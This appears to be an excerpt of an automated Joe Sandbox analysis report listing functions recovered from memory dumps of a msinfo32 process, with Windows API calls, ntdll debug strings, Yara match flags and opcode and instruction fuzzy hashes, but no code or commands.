                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 0110b3c9965cc0052c92bc0fe709acc76135c931d13cce132d46f4484137a53d
                                            • Instruction ID: f8125d4f953e738a97c6dcaaceac223bb50263054508113d095703b7b8332ad1
                                            • Opcode Fuzzy Hash: 0110b3c9965cc0052c92bc0fe709acc76135c931d13cce132d46f4484137a53d
                                            • Instruction Fuzzy Hash: 2801D2B2210108BBCB04DF99DC90EEB77ADAF8C754F408209FA09E3241D630F8518BA4
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EB99D5
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: fabcea1fb3f9b6f37822002f064e5e1b85606466b5d9ed5cfb7f4f4c64767882
                                            • Instruction ID: 08a218685ec3bdb4c59643106d3986854afc99b6fead2e7d649fee87c1593245
                                            • Opcode Fuzzy Hash: fabcea1fb3f9b6f37822002f064e5e1b85606466b5d9ed5cfb7f4f4c64767882
                                            • Instruction Fuzzy Hash: FDF065333C060436E32065A9AC02FD7779DCF847B5F185426F70CDB1C0D995B4414AE5
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EB99D5
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 5d010d1d0a2f487151a3337d461ed6933de95f494344bbb2463cc95373503bb1
                                            • Instruction ID: cb9b868ab21d37aaa28f62d74feea4f32a13a2476153bcfabc06b549ee2d5d8e
                                            • Opcode Fuzzy Hash: 5d010d1d0a2f487151a3337d461ed6933de95f494344bbb2463cc95373503bb1
                                            • Instruction Fuzzy Hash: B3F092772C060036E72066A49C03FDB62998F84795F285429F719EF2C0D9A5F4418AA9
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,02EAC10E,00000007,00000000,00000004,00000000,02EC393F,000000F4), ref: 02ED91BF
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 9446a41cf4e8f749268f82621d75c9b6eb30fdac0d99a0775b656bd5483797e1
                                            • Instruction ID: b8171f17022d7cbbe71fa04f96e6a3db3b46fdc339c66e53f7ed08c42f9cf67c
                                            • Opcode Fuzzy Hash: 9446a41cf4e8f749268f82621d75c9b6eb30fdac0d99a0775b656bd5483797e1
                                            • Instruction Fuzzy Hash: BFE06572200204BBDA14EE58DC50F9B73ADEFC9720F408019F908E7240CA30BA118BF5
                                            APIs
                                            • RtlAllocateHeap.NTDLL(02EC15B9,?,02ED5742,02EC15B9,02ED510E,02ED5742,?,02EC15B9,02ED510E,00001000,?,?,00000000), ref: 02ED916F
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: e02dd31f354a9ea71caa4f52f872791da712f704d7f30e44db72aea6471fb5dc
                                            • Instruction ID: aa2399e58ab3360373a3edb41f1f42d1696b1673a0b0ca0ede7daa29325dd2ef
                                            • Opcode Fuzzy Hash: e02dd31f354a9ea71caa4f52f872791da712f704d7f30e44db72aea6471fb5dc
                                            • Instruction Fuzzy Hash: F0E06572210218BFEA14EE59DC45F9B33ADEF89720F408019F908A7241DA31B9118BB8
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02EC7EDC
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 639206bff8dd8664d1a39c6163783634c9090dbc0455b1b26a15b7f6b45cc83b
                                            • Instruction ID: eb100f396ad68c3e92f28cace535d94364fdba4cf4cfd8e99f4e33f2854af341
                                            • Opcode Fuzzy Hash: 639206bff8dd8664d1a39c6163783634c9090dbc0455b1b26a15b7f6b45cc83b
                                            • Instruction Fuzzy Hash: 3CE048761802041BF72499E89D45B76335C8748668F289968B91CDF1C1E679E9128554
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02EC7EDC
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 61ff0e1c8f8df94fea5a3564e6fb32edc910922d6ef6882b4cdc0d615ad258fa
                                            • Instruction ID: 95b7c98e0edfc6163e457c6b2fd13752bc8a00286079c0d2257cdcae86326c6d
                                            • Opcode Fuzzy Hash: 61ff0e1c8f8df94fea5a3564e6fb32edc910922d6ef6882b4cdc0d615ad258fa
                                            • Instruction Fuzzy Hash: 43E0D8B65C02002FFB24DAB8CC45FB6336C8B48758F38862CB858DF1D1E635D8028D50
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,02EC18A0,02ED7A4F,02ED510E,02EC186D), ref: 02EC7CD3
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 0cb258008b96b5b140ce4d5882fd9889ae7d581bf374471b4d08b6187631bccf
                                            • Instruction ID: 9989daff6e00d10102bbdc3de8f1d0239ca1a4446033cca54fc924ae0792bcbb
                                            • Opcode Fuzzy Hash: 0cb258008b96b5b140ce4d5882fd9889ae7d581bf374471b4d08b6187631bccf
                                            • Instruction Fuzzy Hash: 83E0C2356C02013FF310EAF4DC46FA6325EAB48364F189034F90CDF7C2EA25E1104999
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111), ref: 02EC0997
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                            • Instruction ID: 2b354e1377c6a7662630d8f9d26b95eb14b9a700e294afb82cd89f97ef6456aa
                                            • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                            • Instruction Fuzzy Hash: 4CD0A76774000C7AA60145C4ACC1DFEB71CDB846A5F004067FB08D1040D621490206B1
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,02EC18A0,02ED7A4F,02ED510E,02EC186D), ref: 02EC7CD3
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: db33224625b92d71f954c412d8fec9401b43f61d6a1ecc24de57be6b17189514
                                            • Instruction ID: 907cce3f866ac3461a451d911a54c855f99138f38e43e2f06eb344b9c02870df
                                            • Opcode Fuzzy Hash: db33224625b92d71f954c412d8fec9401b43f61d6a1ecc24de57be6b17189514
                                            • Instruction Fuzzy Hash: 53D05E756C02053BF600A6E4DC06FA7328D9B54764F489078F90CEF2C2EA65F01149A9
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 74b109665001b8dcc7f068b9ffbf9b35a48beb651cde3e04313dc4ad88f7e16c
                                            • Instruction ID: 2bd4cc06cd22007a1e03846cc65b2dd14b121558ae8f26f0abca082f89b33c9b
                                            • Opcode Fuzzy Hash: 74b109665001b8dcc7f068b9ffbf9b35a48beb651cde3e04313dc4ad88f7e16c
                                            • Instruction Fuzzy Hash: 0FB09B71D415C5D6FB11F760470C71779006BD1755F16C066D2030686E4738D5D2F176
                                            APIs
                                              • Part of subcall function 04F02DF0: LdrInitializeThunk.NTDLL ref: 04F02DFA
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F00BA3
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F00BB6
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F00D60
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F00D74
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                            • String ID:
                                            • API String ID: 1404860816-0
                                            • Opcode ID: 0c161ef3365fed4fce03d464ae8bb62832ff397e094cd89adab32bdfb53b4e70
                                            • Instruction ID: 3359ca481f807e0b3f67015a7cd6c0aabc780ff9391862beb51f23025d3736b8
                                            • Opcode Fuzzy Hash: 0c161ef3365fed4fce03d464ae8bb62832ff397e094cd89adab32bdfb53b4e70
                                            • Instruction Fuzzy Hash: 0D424EB1A00715DFDB20CF24C840BAAB7F5BF44314F1485A9D959EB281EB70BA86DF61
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955346292.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4d20000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c824435926a43913f8f879491b9fb494cdba590b121a63757dd90538a68a7d42
                                            • Instruction ID: 3476df034d29af3afff379e03657db5c4c99ea235676eb087a2de80f5e7ce2f6
                                            • Opcode Fuzzy Hash: c824435926a43913f8f879491b9fb494cdba590b121a63757dd90538a68a7d42
                                            • Instruction Fuzzy Hash: C541F77061CB1E4FD368EF69908167AB3E2FB95308F50052DDACAC3652EB74F8468785
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955346292.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4d20000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                            • API String ID: 0-3558027158
                                            • Opcode ID: 28a01d19e63be1141701225d718533718b3fb28eb0892be65aaeaef9d7b0772b
                                            • Instruction ID: 31b605f349f1c2582bb75b6403a0b169d430969e977272a030c1601adfe1ea72
                                            • Opcode Fuzzy Hash: 28a01d19e63be1141701225d718533718b3fb28eb0892be65aaeaef9d7b0772b
                                            • Instruction Fuzzy Hash: B0916FF04082988AC7158F54A1612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB95
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: eb826d2180e0e0a2c77304fbc7817e71ce7abe57b594a2ff86ade8dfaa7affe3
                                            • Instruction ID: 389976633407c9fad2a69e19e1edf829584520768fc83717babbbe3d1ba07b6c
                                            • Opcode Fuzzy Hash: eb826d2180e0e0a2c77304fbc7817e71ce7abe57b594a2ff86ade8dfaa7affe3
                                            • Instruction Fuzzy Hash: A551E8B6E00116BFDB21DF98888497EF7F8BB48205711C169E495D7681E634FE42ABE0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 94c562738fe45467ebe5dfe6f1dbf3266edbb0ff22ec6851f923d2ee9d70d4cb
                                            • Instruction ID: e4dd953ca1ca06ce587219ea52ca87e24495506c04816a537616f88658cdc723
                                            • Opcode Fuzzy Hash: 94c562738fe45467ebe5dfe6f1dbf3266edbb0ff22ec6851f923d2ee9d70d4cb
                                            • Instruction Fuzzy Hash: C951F271A00645AFDB30DF9CCC9097FB7F9EF44204B0584AAE4D6D7681EA78FA418B60
                                            Strings
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 04F34787
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04F34725
                                            • Execute=1, xrefs: 04F34713
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04F34655
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04F34742
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04F346FC
                                            • ExecuteOptions, xrefs: 04F346A0
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 24463772d4d69cecc1c82143a19bb17fa7470110be485fa45b0c026f83c1d224
                                            • Instruction ID: 3d3232216eb5357c57f4df6409951d4b6acd5ea44e5adaba1cc79b39b25f26fe
                                            • Opcode Fuzzy Hash: 24463772d4d69cecc1c82143a19bb17fa7470110be485fa45b0c026f83c1d224
                                            • Instruction Fuzzy Hash: 9751D831A002196BEF14AFA4DC85FED77A8EF48309F051499E605AB1D0EB71BE468F51
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction ID: dc944a783e502a6b2b641b1839b7c01082651e2c4108d4648bf0cddbcfc08b0a
                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction Fuzzy Hash: 61818070E452499EDF288EE8C8517BEBBB6AFC5310F18C659D861A72D0D734B843EB50
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 04F3031E
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04F302BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04F302E7
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 12653ea141d91f29fbd47a549dca6e02935b7733b80fc5828f81689f4202ffe5
                                            • Instruction ID: 1efe7533959fb57bde03eef9a08734bf9b749586f97853150d68923428a56f0d
                                            • Opcode Fuzzy Hash: 12653ea141d91f29fbd47a549dca6e02935b7733b80fc5828f81689f4202ffe5
                                            • Instruction Fuzzy Hash: 63E1AE30604741EFE724CF29C884B6AB7E0FF88318F144A59E5958B2D1EB74F946CB92
                                            Strings
                                            • RTL: Resource at %p, xrefs: 04F37B8E
                                            • RTL: Re-Waiting, xrefs: 04F37BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04F37B7F
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: a136c1a39b5c979e8950dda7d075ddf4163600f19bc342a58acfd3b6b9f21d03
                                            • Instruction ID: 2f33da96d9f72432818af82e3fc662562d186148187def5c58c388678e18c5f4
                                            • Opcode Fuzzy Hash: a136c1a39b5c979e8950dda7d075ddf4163600f19bc342a58acfd3b6b9f21d03
                                            • Instruction Fuzzy Hash: 2941D2367047029FD724DE25CC40B6AB7E5EF88715F101A1DEA5ADB680EB31F9068B91
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F3728C
                                            Strings
                                            • RTL: Resource at %p, xrefs: 04F372A3
                                            • RTL: Re-Waiting, xrefs: 04F372C1
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04F37294
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: db7f81d15762d0f0408f1058eb07f01d1a59a7f7866f65a20b9c6dbbdc26aed1
                                            • Instruction ID: 1aef14bc4b8a3d0ab206f0539d83c1408af9992cc36ca2e4cee789df083e2af0
                                            • Opcode Fuzzy Hash: db7f81d15762d0f0408f1058eb07f01d1a59a7f7866f65a20b9c6dbbdc26aed1
                                            • Instruction Fuzzy Hash: 7441D271B00202AFD720EE25CC41F66B7E5FB84715F104619FA55EB680EB21F8579BE1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: b037e360b5f0774401391515085947984850b4ff0be79010d29ec3c808ec93d9
                                            • Instruction ID: 7315361c0490cbfd6e10d69eabd57a650a82245dc322b19cd836f661e265adf4
                                            • Opcode Fuzzy Hash: b037e360b5f0774401391515085947984850b4ff0be79010d29ec3c808ec93d9
                                            • Instruction Fuzzy Hash: 1E318172A002199FDB60DF29DC40BEFB7B8EB44714F454596E849E3240EB34BA468FA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955346292.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4d20000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: XWp$XWp$XWp$XWp$XWp
                                            • API String ID: 0-2868150270
                                            • Opcode ID: e68e3dcab11b0c72b9d929d8dd4058fb9349e460efec1846e0ec09c16a406ae4
                                            • Instruction ID: c9b9228c1aa78dde1ad2160a9279e35a9f88232c59d046df0c571e08befcca28
                                            • Opcode Fuzzy Hash: e68e3dcab11b0c72b9d929d8dd4058fb9349e460efec1846e0ec09c16a406ae4
                                            • Instruction Fuzzy Hash: 6F017870C1070D8BAF88EFA588061EEBEB0FB14301F60812AC41AF6264DBF44A419F96
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction ID: 740d48f62989b7d754c22edabc16b368eb805a145cdeca8b338e5acb9c881c19
                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction Fuzzy Hash: 7791B471F002169BDF24EE69C8806BEB7E5AFC4361F54C59AE855E72C0E730B942E760
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                             • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 63911289c840f1ef91d14e93ad20a3a0d513f27da70a96f62489c9cd56d11572
                                            • Instruction ID: 62e412d7673a7a82c098f8da3459aabebcfbec60e2767e02e4ded24ab0640713
                                            • Opcode Fuzzy Hash: 63911289c840f1ef91d14e93ad20a3a0d513f27da70a96f62489c9cd56d11572
                                            • Instruction Fuzzy Hash: F9811CB2D002699BDB35DF54CD45BEEB7B4AB08714F0141EAE919B7240E770AE85CFA0